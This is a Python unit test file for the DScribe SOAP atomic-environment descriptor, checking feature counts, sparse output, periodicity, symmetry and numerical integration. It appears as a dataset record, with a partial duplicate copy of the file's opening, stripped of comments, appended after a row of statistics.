vec1 = a.create(H2O)
a.species = ["C", "H", "O"]
nfeat2 = a.get_number_of_features()
vec2 = a.create(molecule("CH3OH"))
self.assertTrue(nfeat1 != nfeat2)
self.assertTrue(vec1.shape[1] != vec2.shape[1])
def test_number_of_features(self):
"""Tests that the reported number of features is correct.
"""
lmax = 5
nmax = 5
n_elems = 2
desc = SOAP(species=[1, 8], rcut=5, nmax=nmax, lmax=lmax, periodic=True)
# Test that the reported number of features matches the expected
n_features = desc.get_number_of_features()
n_blocks = n_elems*(n_elems+1)/2
expected = int((lmax + 1) * nmax * (nmax + 1) / 2 * n_blocks)
self.assertEqual(n_features, expected)
# Test that the outputted number of features matches the reported
n_features = desc.get_number_of_features()
vec = desc.create(H2O)
self.assertEqual(n_features, vec.shape[1])
def test_multiple_species(self):
"""Tests multiple species are handled correctly.
"""
lmax = 5
nmax = 5
species = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
desc = SOAP(species=species, rcut=5, nmax=nmax, lmax=lmax, periodic=False, sparse=False)
pos = np.expand_dims(np.linspace(0, 8, 8), 1)
pos = np.hstack((pos, pos, pos))
sys = Atoms(
symbols=species[0:8],
positions=pos,
pbc=False
)
vec1 = desc.create(sys)
sys2 = Atoms(
symbols=species[8:],
positions=pos,
pbc=False
)
vec2 = desc.create(sys2)
sys3 = Atoms(
symbols=species[4:12],
positions=pos,
pbc=False
)
vec3 = desc.create(sys3)
dot1 = np.dot(vec1[6, :], vec2[6, :])
dot2 = np.dot(vec1[3, :], vec3[3, :])
dot3 = np.dot(vec2[3, :], vec3[3, :])
# The dot product for systems without overlap in species should be zero
self.assertTrue(abs(dot1) <= 1e-8)
# The systems with overlap in the elements should have onerlap in the
# dot product
self.assertTrue(abs(dot2) > 1e-3)
self.assertTrue(abs(dot3) > 1e-3)
def test_flatten(self):
"""Tests the flattening.
"""
def test_soap_structure(self):
"""Tests that when no positions are given, the SOAP for the full
structure is calculated.
"""
lmax = 5
nmax = 5
desc = SOAP(species=[1, 8], rcut=5, nmax=nmax, lmax=lmax, periodic=True)
vec = desc.create(H2O)
self.assertTrue(vec.shape[0] == 3)
def test_sparse(self):
"""Tests the sparse matrix creation.
"""
# Dense
desc = SOAP(species=[1, 8], rcut=5, nmax=5, lmax=5, periodic=True, sparse=False)
vec = desc.create(H2O)
self.assertTrue(type(vec) == np.ndarray)
# Sparse
desc = SOAP(species=[1, 8], rcut=5, nmax=5, lmax=5, periodic=True, sparse=True)
vec = desc.create(H2O)
self.assertTrue(type(vec) == scipy.sparse.coo_matrix)
def test_positions(self):
"""Tests that different positions are handled correctly.
"""
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True,)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=False,)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=False,)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
with self.assertRaises(ValueError):
desc.create(H2O, positions=['a'])
def test_parallel_dense(self):
"""Tests creating dense output parallelly.
"""
samples = [molecule("CO"), molecule("N2O")]
desc = SOAP(
species=[6, 7, 8],
rcut=5,
nmax=3,
lmax=3,
sigma=1,
periodic=False,
crossover=True,
average=False,
sparse=False,
)
n_features = desc.get_number_of_features()
# Multiple systems, serial job
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=1,
)
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = desc.create(samples[1], [0])
assumed[2, :] = desc.create(samples[1], [1])
self.assertTrue(np.allclose(output, assumed))
# Test when position given as indices
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
)
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = desc.create(samples[1], [0])
assumed[2, :] = desc.create(samples[1], [1])
self.assertTrue(np.allclose(output, assumed))
# Test with no positions specified
output = desc.create(
system=samples,
positions=[None, None],
n_jobs=2,
)
assumed = np.empty((2+3, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = desc.create(samples[0], [1])
assumed[2, :] = desc.create(samples[1], [0])
assumed[3, :] = desc.create(samples[1], [1])
assumed[4, :] = desc.create(samples[1], [2])
self.assertTrue(np.allclose(output, assumed))
# Test with cartesian positions
output = desc.create(
system=samples,
positions=[[[0, 0, 0], [1, 2, 0]], [[1, 2, 0]]],
n_jobs=2,
)
assumed = np.empty((2+1, n_features))
assumed[0, :] = desc.create(samples[0], [[0, 0, 0]])
assumed[1, :] = desc.create(samples[0], [[1, 2, 0]])
assumed[2, :] = desc.create(samples[1], [[1, 2, 0]])
self.assertTrue(np.allclose(output, assumed))
# Test averaged output
desc._average = True
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
)
assumed = np.empty((2, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = 1/2*(desc.create(samples[1], [0]) + desc.create(samples[1], [1]))
self.assertTrue(np.allclose(output, assumed))
def test_parallel_sparse(self):
"""Tests creating sparse output parallelly.
"""
# Test indices
samples = [molecule("CO"), molecule("N2O")]
desc = SOAP(
species=[6, 7, 8],
rcut=5,
nmax=3,
lmax=3,
sigma=1,
periodic=False,
crossover=True,
average=False,
sparse=True,
)
n_features = desc.get_number_of_features()
# Multiple systems, serial job
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=1,
).toarray()
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = desc.create(samples[1], [0]).toarray()
assumed[2, :] = desc.create(samples[1], [1]).toarray()
self.assertTrue(np.allclose(output, assumed))
# Test when position given as indices
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
).toarray()
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = desc.create(samples[1], [0]).toarray()
assumed[2, :] = desc.create(samples[1], [1]).toarray()
self.assertTrue(np.allclose(output, assumed))
# Test with no positions specified
output = desc.create(
system=samples,
positions=[None, None],
n_jobs=2,
).toarray()
assumed = np.empty((2+3, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = desc.create(samples[0], [1]).toarray()
assumed[2, :] = desc.create(samples[1], [0]).toarray()
assumed[3, :] = desc.create(samples[1], [1]).toarray()
assumed[4, :] = desc.create(samples[1], [2]).toarray()
self.assertTrue(np.allclose(output, assumed))
# Test with cartesian positions
output = desc.create(
system=samples,
positions=[[[0, 0, 0], [1, 2, 0]], [[1, 2, 0]]],
n_jobs=2,
).toarray()
assumed = np.empty((2+1, n_features))
assumed[0, :] = desc.create(samples[0], [[0, 0, 0]]).toarray()
assumed[1, :] = desc.create(samples[0], [[1, 2, 0]]).toarray()
assumed[2, :] = desc.create(samples[1], [[1, 2, 0]]).toarray()
self.assertTrue(np.allclose(output, assumed))
# Test averaged output
desc._average = True
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
).toarray()
assumed = np.empty((2, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = 1/2*(desc.create(samples[1], [0]).toarray() + desc.create(samples[1], [1]).toarray())
self.assertTrue(np.allclose(output, assumed))
def test_unit_cells(self):
"""Tests if arbitrary unit cells are accepted"""
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
molecule = H2O.copy()
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
nocell = desc.create(molecule, positions=[[0, 0, 0]])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True,)
# Invalid unit cell
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
with self.assertRaises(ValueError):
desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_pbc(True)
molecule.set_cell([
[20.0, 0.0, 0.0],
[0.0, 30.0, 0.0],
[0.0, 0.0, 40.0],
])
largecell = desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_cell([
[2.0, 0.0, 0.0],
[0.0, 2.0, 0.0],
[0.0, 0.0, 2.0]
])
cubic_cell = desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_cell([
[0.0, 2.0, 2.0],
[2.0, 0.0, 2.0],
[2.0, 2.0, 0.0]
])
triclinic_smallcell = desc.create(molecule, positions=[[0, 0, 0]])
def test_is_periodic(self):
"""Tests whether periodic images are seen by the descriptor"""
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True,)
H2O.set_pbc(False)
nocell = desc.create(H2O, positions=[[0, 0, 0]])
H2O.set_pbc(True)
H2O.set_cell([
[2.0, 0.0, 0.0],
[0.0, 2.0, 0.0],
[0.0, 0.0, 2.0]
])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True)
cubic_cell = desc.create(H2O, positions=[[0, 0, 0]])
self.assertTrue(np.sum(cubic_cell) > 0)
def test_periodic_images(self):
"""Tests the periodic images seen by the descriptor
"""
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
molecule = H2O.copy()
# Non-periodic for comparison
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
nocell = desc.create(molecule, positions=[[0, 0, 0]])
# Make periodic
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True)
molecule.set_pbc(True)
# Cubic
molecule.set_cell([
[3.0, 0.0, 0.0],
[0.0, 3.0, 0.0],
[0.0, 0.0, 3.0]
])
cubic_cell = desc.create(molecule, positions=[[0, 0, 0]])
suce = molecule * (2, 1, 1)
cubic_suce = desc.create(suce, positions=[[0, 0, 0]])
# Triclinic
molecule.set_cell([
[0.0, 2.0, 2.0],
[2.0, 0.0, 2.0],
[2.0, 2.0, 0.0]
])
triclinic_cell = desc.create(molecule, positions=[[0, 0, 0]])
suce = molecule * (2, 1, 1)
triclinic_suce = desc.create(suce, positions=[[0, 0, 0]])
self.assertTrue(np.sum(np.abs((nocell[:3] - cubic_suce[:3]))) > 0.1)
self.assertAlmostEqual(np.sum(cubic_cell[:3] - cubic_suce[:3]), 0)
self.assertAlmostEqual(np.sum(triclinic_cell[:3] - triclinic_suce[:3]), 0)
def test_symmetries(self):
"""Tests that the descriptor has the correct invariances.
"""
def create_gto(system):
desc = SOAP(
species=system.get_atomic_numbers(),
rcut=8.0,
lmax=5,
nmax=5,
rbf="gto",
periodic=False,
crossover=True
)
return desc.create(system)
# Rotational check
self.assertTrue(self.is_rotationally_symmetric(create_gto))
# Translational
self.assertTrue(self.is_translationally_symmetric(create_gto))
def create_poly(system):
desc = SOAP(
species=system.get_atomic_numbers(),
rcut=8.0,
lmax=2,
nmax=1,
rbf="polynomial",
periodic=False,
crossover=True
)
return desc.create(system)
# Rotational check
self.assertTrue(self.is_rotationally_symmetric(create_poly))
# Translational
self.assertTrue(self.is_translationally_symmetric(create_poly))
def test_average(self):
"""Tests that the average output is created correctly.
"""
sys = Atoms(symbols=["H", "C"], positions=[[-1, 0, 0], [1, 0, 0]], cell=[2, 2, 2], pbc=True)
# Create the average output
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
average=True,
sparse=False
)
average = desc.create(sys)[0, :]
# Create individual output for both atoms
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
average=False,
sparse=False
)
first = desc.create(sys, positions=[0])[0, :]
second = desc.create(sys, positions=[1])[0, :]
# Check that the averaging is done correctlyl
assumed_average = (first+second)/2
self.assertTrue(np.array_equal(average, assumed_average))
def test_basis(self):
"""Tests that the output vectors behave correctly as a basis.
"""
sys1 = Atoms(symbols=["H", "H"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys2 = Atoms(symbols=["O", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys3 = Atoms(symbols=["C", "C"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys4 = Atoms(symbols=["H", "C"], positions=[[-1, 0, 0], [1, 0, 0]], cell=[2, 2, 2], pbc=True)
sys5 = Atoms(symbols=["H", "C"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys6 = Atoms(symbols=["H", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys7 = Atoms(symbols=["C", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
sparse=False
)
# Create vectors for each system
vec1 = desc.create(sys1, positions=[[0, 0, 0]])[0, :]
vec2 = desc.create(sys2, positions=[[0, 0, 0]])[0, :]
vec3 = desc.create(sys3, positions=[[0, 0, 0]])[0, :]
vec4 = desc.create(sys4, positions=[[0, 0, 0]])[0, :]
vec5 = desc.create(sys5, positions=[[0, 0, 0]])[0, :]
vec6 = desc.create(sys6, positions=[[0, 0, 0]])[0, :]
vec7 = desc.create(sys7, positions=[[0, 0, 0]])[0, :]
# The dot-product should be zero when there are no overlapping elements
dot = np.dot(vec1, vec2)
self.assertEqual(dot, 0)
dot = np.dot(vec2, vec3)
self.assertEqual(dot, 0)
# The dot-product should be non-zero when there are overlapping elements
dot = np.dot(vec4, vec5)
self.assertNotEqual(dot, 0)
# Check that self-terms are in correct location
n_elem_feat = desc.get_number_of_element_features()
h_part1 = vec1[0:n_elem_feat]
h_part2 = vec2[0:n_elem_feat]
h_part4 = vec4[0:n_elem_feat]
self.assertNotEqual(np.sum(h_part1), 0)
self.assertEqual(np.sum(h_part2), 0)
self.assertNotEqual(np.sum(h_part4), 0)
# Check that cross terms are in correct location
hc_part1 = vec1[1*n_elem_feat:2*n_elem_feat]
hc_part4 = vec4[1*n_elem_feat:2*n_elem_feat]
co_part6 = vec6[4*n_elem_feat:5*n_elem_feat]
co_part7 = vec7[4*n_elem_feat:5*n_elem_feat]
self.assertEqual(np.sum(hc_part1), 0)
self.assertNotEqual(np.sum(hc_part4), 0)
self.assertEqual(np.sum(co_part6), 0)
self.assertNotEqual(np.sum(co_part7), 0)
def test_rbf_orthonormality(self):
"""Tests that the gto radial basis functions are orthonormal.
"""
sigma = 0.15
rcut = 2.0
nmax = 2
lmax = 3
soap = SOAP(species=[1], lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, crossover=True, sparse=False)
alphas = np.reshape(soap._alphas, [10, nmax])
betas = np.reshape(soap._betas, [10, nmax, nmax])
nr = 10000
n_basis = 0
functions = np.zeros((nmax, lmax+1, nr))
# Form the radial basis functions
for n in range(nmax):
for l in range(lmax+1):
gto = np.zeros((nr))
rspace = np.linspace(0, rcut+5, nr)
for k in range(nmax):
gto += betas[l, n, k]*rspace**l*np.exp(-alphas[l, k]*rspace**2)
n_basis += 1
functions[n, l, :] = gto
# Calculate the overlap integrals
S = np.zeros((nmax, nmax))
l = 0
for l in range(lmax+1):
for i in range(nmax):
for j in range(nmax):
overlap = np.trapz(rspace**2*functions[i, l, :]*functions[j, l, :], dx=(rcut+5)/nr)
S[i, j] = overlap
# Check that the basis functions for each l are orthonormal
diff = S-np.eye(nmax)
self.assertTrue(np.allclose(diff, np.zeros((nmax, nmax)), atol=1e-3))
def test_gto_integration(self):
"""Tests that the completely analytical partial power spectrum with the
GTO basis corresponds to the easier-to-code but less performant
numerical integration done with python.
"""
sigma = 0.55
rcut = 2.0
nmax = 2
lmax = 2
# Limits for radius
r1 = 0.
r2 = rcut+5
# Limits for theta
t1 = 0
t2 = np.pi
# Limits for phi
p1 = 0
p2 = 2*np.pi
positions = np.array([[0.0, 0.0, 0.0], [-0.3, 0.5, 0.4]])
symbols = np.array(["H", "C"])
system = Atoms(positions=positions, symbols=symbols)
species = system.get_atomic_numbers()
elements = set(system.get_atomic_numbers())
n_elems = len(elements)
# Calculate the analytical power spectrum and the weights and decays of
# the radial basis functions.
soap = SOAP(species=species, lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, crossover=True, sparse=False)
analytical_power_spectrum = soap.create(system, positions=[[0, 0, 0]])[0]
alphagrid = np.reshape(soap._alphas, [10, nmax])
betagrid = np.reshape(soap._betas, [10, nmax, nmax])
coeffs = np.zeros((n_elems, nmax, lmax+1, 2*lmax+1))
for iZ, Z in enumerate(elements):
indices = np.argwhere(species == Z)[0]
elem_pos = positions[indices]
for n in range(nmax):
for l in range(lmax+1):
for im, m in enumerate(range(-l, l+1)):
# Calculate numerical coefficients
def soap_coeff(phi, theta, r):
# Regular spherical harmonic, notice the abs(m)
# needed for constructing the real form
ylm_comp = scipy.special.sph_harm(np.abs(m), l, phi, theta) # NOTE: scipy swaps phi and theta
# Construct real (tesseral) spherical harmonics for
# easier integration without having to worry about
# the imaginary part. The real spherical harmonics
# span the same space, but are just computationally
# easier.
ylm_real = np.real(ylm_comp)
ylm_imag = np.imag(ylm_comp)
if m < 0:
ylm = np.sqrt(2)*(-1)**m*ylm_imag
elif m == 0:
ylm = ylm_comp
else:
ylm = np.sqrt(2)*(-1)**m*ylm_real
# Spherical gaussian type orbital
gto = 0
for i in range(nmax):
i_alpha = alphagrid[l, i]
i_beta = betagrid[l, n, i]
i_gto = i_beta*r**l*np.exp(-i_alpha*r**2)
gto += i_gto
# Atomic density
rho = 0
for i_pos in elem_pos:
ix = i_pos[0]
iy = i_pos[1]
iz = i_pos[2]
ri_squared = ix**2+iy**2+iz**2
rho += np.exp(-1/(2*sigma**2)*(r**2 + ri_squared - 2*r*(np.sin(theta)*np.cos(phi)*ix + np.sin(theta)*np.sin(phi)*iy + np.cos(theta)*iz)))
# Jacobian
jacobian = np.sin(theta)*r**2
return gto*ylm*rho*jacobian
cnlm = tplquad(
soap_coeff,
r1,
r2,
lambda r: t1,
lambda r: t2,
lambda r, theta: p1,
lambda r, theta: p2,
epsabs=0.001,
epsrel=0.001,
)
integral, error = cnlm
coeffs[iZ, n, l, im] = integral
# Calculate the partial power spectrum
numerical_power_spectrum = []
for zi in range(n_elems):
for zj in range(n_elems):
for l in range(lmax+1):
for ni in range(nmax):
for nj in range(nmax):
if nj >= ni:
if zj >= zi:
value = np.dot(coeffs[zi, ni, l, :], coeffs[zj, nj, l, :])
prefactor = np.pi*np.sqrt(8/(2*l+1))
value *= prefactor
numerical_power_spectrum.append(value)
# print("Numerical: {}".format(numerical_power_spectrum))
# print("Analytical: {}".format(analytical_power_spectrum))
self.assertTrue(np.allclose(numerical_power_spectrum, analytical_power_spectrum, atol=1e-15, rtol=0.01))
def test_poly_integration(self):
"""Tests that the partial power spectrum with the polynomial basis done
with C corresponds to the easier-to-code but less performant
integration done with python.
"""
sigma = 0.55
rcut = 2.0
nmax = 2
lmax = 2
# Limits for radius
r1 = 0.
r2 = rcut+5
# Limits for theta
t1 = 0
t2 = np.pi
# Limits for phi
p1 = 0
p2 = 2*np.pi
positions = np.array([[0.0, 0.0, 0.0], [-0.3, 0.5, 0.4]])
symbols = np.array(["H", "C"])
system = Atoms(positions=positions, symbols=symbols)
species = system.get_atomic_numbers()
elements = set(system.get_atomic_numbers())
n_elems = len(elements)
# Calculate the overlap of the different polynomial functions in a
# matrix S. These overlaps defined through the dot product over the
# radial coordinate are analytically calculable: Integrate[(rc - r)^(a
# + 2) (rc - r)^(b + 2) r^2, {r, 0, rc}]. Then the weights B that make
# the basis orthonormal are given by B=S^{-1/2}
S = np.zeros((nmax, nmax))
for i in range(1, nmax+1):
for j in range(1, nmax+1):
S[i-1, j-1] = (2*(rcut)**(7+i+j))/((5+i+j)*(6+i+j)*(7+i+j))
betas = sqrtm(np.linalg.inv(S))
# Calculate the analytical power spectrum and the weights and decays of
# the radial basis functions.
soap = SOAP(species=species, lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, rbf="polynomial", crossover=True, sparse=False)
analytical_power_spectrum = soap.create(system, positions=[[0, 0, 0]])[0]
coeffs = np.zeros((n_elems, nmax, lmax+1, 2*lmax+1))
for iZ, Z in enumerate(elements):
indices = np.argwhere(species == Z)[0]
elem_pos = positions[indices]
for n in range(nmax):
for l in range(lmax+1):
for im, m in enumerate(range(-l, l+1)):
# Calculate numerical coefficients
def soap_coeff(phi, theta, r):
# Regular spherical harmonic, notice the abs(m)
# needed for constructing the real form
ylm_comp = scipy.special.sph_harm(np.abs(m), l, phi, theta) # NOTE: scipy swaps phi and theta
# Construct real (tesseral) spherical harmonics for
# easier integration without having to worry about
# the imaginary part. The real spherical harmonics
# span the same space, but are just computationally
# easier.
ylm_real = np.real(ylm_comp)
ylm_imag = np.imag(ylm_comp)
if m < 0:
ylm = np.sqrt(2)*(-1)**m*ylm_imag
elif m == 0:
ylm = ylm_comp
else:
ylm = np.sqrt(2)*(-1)**m*ylm_real
# Polynomial basis
poly = 0
for k in range(1, nmax+1):
poly += betas[n, k-1]*(rcut-np.clip(r, 0, rcut))**(k+2)
# Atomic density
rho = 0
for i_pos in elem_pos:
ix = i_pos[0]
iy = i_pos[1]
iz = i_pos[2]
ri_squared = ix**2+iy**2+iz**2
rho += np.exp(-1/(2*sigma**2)*(r**2 + ri_squared - 2*r*(np.sin(theta)*np.cos(phi)*ix + np.sin(theta)*np.sin(phi)*iy + np.cos(theta)*iz)))
# Jacobian
jacobian = np.sin(theta)*r**2
return poly*ylm*rho*jacobian
cnlm = tplquad(
soap_coeff,
r1,
r2,
lambda r: t1,
lambda r: t2,
lambda r, theta: p1,
lambda r, theta: p2,
epsabs=0.0001,
epsrel=0.0001,
)
integral, error = cnlm
coeffs[iZ, n, l, im] = integral
# Calculate the partial power spectrum
numerical_power_spectrum = []
for zi in range(n_elems):
for zj in range(n_elems):
for l in range(lmax+1):
for ni in range(nmax):
for nj in range(nmax):
if nj >= ni and zj >= zi:
value = np.dot(coeffs[zi, ni, l, :], coeffs[zj, nj, l, :])
prefactor = np.pi*np.sqrt(8/(2*l+1))
value *= prefactor
numerical_power_spectrum.append(value)
# print("Numerical: {}".format(numerical_power_spectrum))
# print("Analytical: {}".format(analytical_power_spectrum))
self.assertTrue(np.allclose(numerical_power_spectrum, analytical_power_spectrum, atol=1e-15, rtol=0.01))
def test_padding(self):
"""Tests that the padding used in constructing extended systems is
sufficient.
"""
# Fix random seed for tests
np.random.seed(7)
# Loop over different cell sizes
for ncells in range(1, 6):
ncells = int(ncells)
# Loop over different radial cutoffs
for rcut in np.linspace(2, 10, 11):
# Loop over different sigmas
for sigma in np.linspace(0.5, 2, 4):
# Create descriptor generators
soap_generator = SOAP(
rcut=rcut, nmax=4, lmax=4, sigma=sigma, species=["Ni", "Ti"], periodic=True
)
# Define unit cell
a = 2.993
niti = Atoms(
"NiTi",
positions=[[0.0, 0.0, 0.0], [a / 2, a / 2, a / 2]],
cell=[a, a, a],
pbc=[1, 1, 1],
)
# Replicate system
niti = niti * ncells
a *= ncells
# Add some noise to positions
positions = niti.get_positions()
noise = np.random.normal(scale=0.5, size=positions.shape)
niti.set_positions(positions + noise)
niti.wrap()
# Evaluate descriptors for orthogonal unit cell
orthogonal_soaps = soap_generator.create(niti)
# Redefine the cubic unit cell as monoclinic
# with a 45-degree angle,
# this should not affect the descriptors
niti.set_cell([[a, 0, 0], [0, a, 0], [a, 0, a]])
niti.wrap()
# Evaluate descriptors for new, monoclinic unit cell
non_orthogonal_soaps = soap_generator.create(niti)
# Check that the relative or absolute error is small enough
self.assertTrue(np.allclose(orthogonal_soaps, non_orthogonal_soaps, atol=1e-8, rtol=1e-2))
if __name__ == '__main__':
suites = []
suites.append(unittest.TestLoader().loadTestsFromTestCase(SoapTests))
alltests = unittest.TestSuite(suites)
result = unittest.TextTestRunner(verbosity=0).run(alltests)
| 37.631791 | 169 | 0.508127 |
import math
import unittest
import numpy as np
import scipy
import scipy.sparse
from scipy.integrate import tplquad
from scipy.linalg import sqrtm
from dscribe.descriptors import SOAP
from testbaseclass import TestBaseClass
from ase import Atoms
from ase.build import molecule
H2O = Atoms(
cell=[
[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]
],
positions=[
[0, 0, 0],
[0.95, 0, 0],
[0.95*(1+math.cos(76/180*math.pi)), 0.95*math.sin(76/180*math.pi), 0.0]
],
symbols=["H", "O", "H"],
)
H = Atoms(
cell=[
[15.0, 0.0, 0.0],
[0.0, 15.0, 0.0],
[0.0, 0.0, 15.0]
],
positions=[
[0, 0, 0],
],
symbols=["H"],
)
class SoapTests(TestBaseClass, unittest.TestCase):
def test_constructor(self):
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=5, sigma=0, nmax=5, lmax=5, periodic=True)
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=5, sigma=-1, nmax=5, lmax=5, periodic=True)
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=0.5, sigma=0, nmax=5, lmax=5, periodic=True)
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=0.5, sigma=0, nmax=5, lmax=10, rbf="gto", periodic=True)
with self.assertRaises(ValueError):
SOAP(species=["H", "O"], rcut=4, sigma=1, nmax=0, lmax=8, rbf="gto", periodic=True)
with self.assertRaises(ValueError):
a = SOAP(species=["H", "O"], rcut=10, sigma=0.5, nmax=12, lmax=8, rbf="polynomial", periodic=False)
a.create(H2O)
with self.assertRaises(ValueError):
a = SOAP(species=["H", "O"], rcut=10, sigma=0.5, nmax=20, lmax=8, rbf="gto", periodic=False)
a.create(H2O)
def test_properties(self):
a = SOAP(
species=[1, 8],
rcut=3,
nmax=3,
lmax=3,
sparse=False,
)
nfeat1 = a.get_number_of_features()
vec1 = a.create(H2O)
a.species = ["C", "H", "O"]
nfeat2 = a.get_number_of_features()
vec2 = a.create(molecule("CH3OH"))
self.assertTrue(nfeat1 != nfeat2)
self.assertTrue(vec1.shape[1] != vec2.shape[1])
def test_number_of_features(self):
lmax = 5
nmax = 5
n_elems = 2
desc = SOAP(species=[1, 8], rcut=5, nmax=nmax, lmax=lmax, periodic=True)
n_features = desc.get_number_of_features()
n_blocks = n_elems*(n_elems+1)/2
expected = int((lmax + 1) * nmax * (nmax + 1) / 2 * n_blocks)
self.assertEqual(n_features, expected)
n_features = desc.get_number_of_features()
vec = desc.create(H2O)
self.assertEqual(n_features, vec.shape[1])
def test_multiple_species(self):
lmax = 5
nmax = 5
species = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
desc = SOAP(species=species, rcut=5, nmax=nmax, lmax=lmax, periodic=False, sparse=False)
pos = np.expand_dims(np.linspace(0, 8, 8), 1)
pos = np.hstack((pos, pos, pos))
sys = Atoms(
symbols=species[0:8],
positions=pos,
pbc=False
)
vec1 = desc.create(sys)
sys2 = Atoms(
symbols=species[8:],
positions=pos,
pbc=False
)
vec2 = desc.create(sys2)
sys3 = Atoms(
symbols=species[4:12],
positions=pos,
pbc=False
)
vec3 = desc.create(sys3)
dot1 = np.dot(vec1[6, :], vec2[6, :])
dot2 = np.dot(vec1[3, :], vec3[3, :])
dot3 = np.dot(vec2[3, :], vec3[3, :])
self.assertTrue(abs(dot1) <= 1e-8)
self.assertTrue(abs(dot2) > 1e-3)
self.assertTrue(abs(dot3) > 1e-3)
def test_flatten(self):
def test_soap_structure(self):
lmax = 5
nmax = 5
desc = SOAP(species=[1, 8], rcut=5, nmax=nmax, lmax=lmax, periodic=True)
vec = desc.create(H2O)
self.assertTrue(vec.shape[0] == 3)
def test_sparse(self):
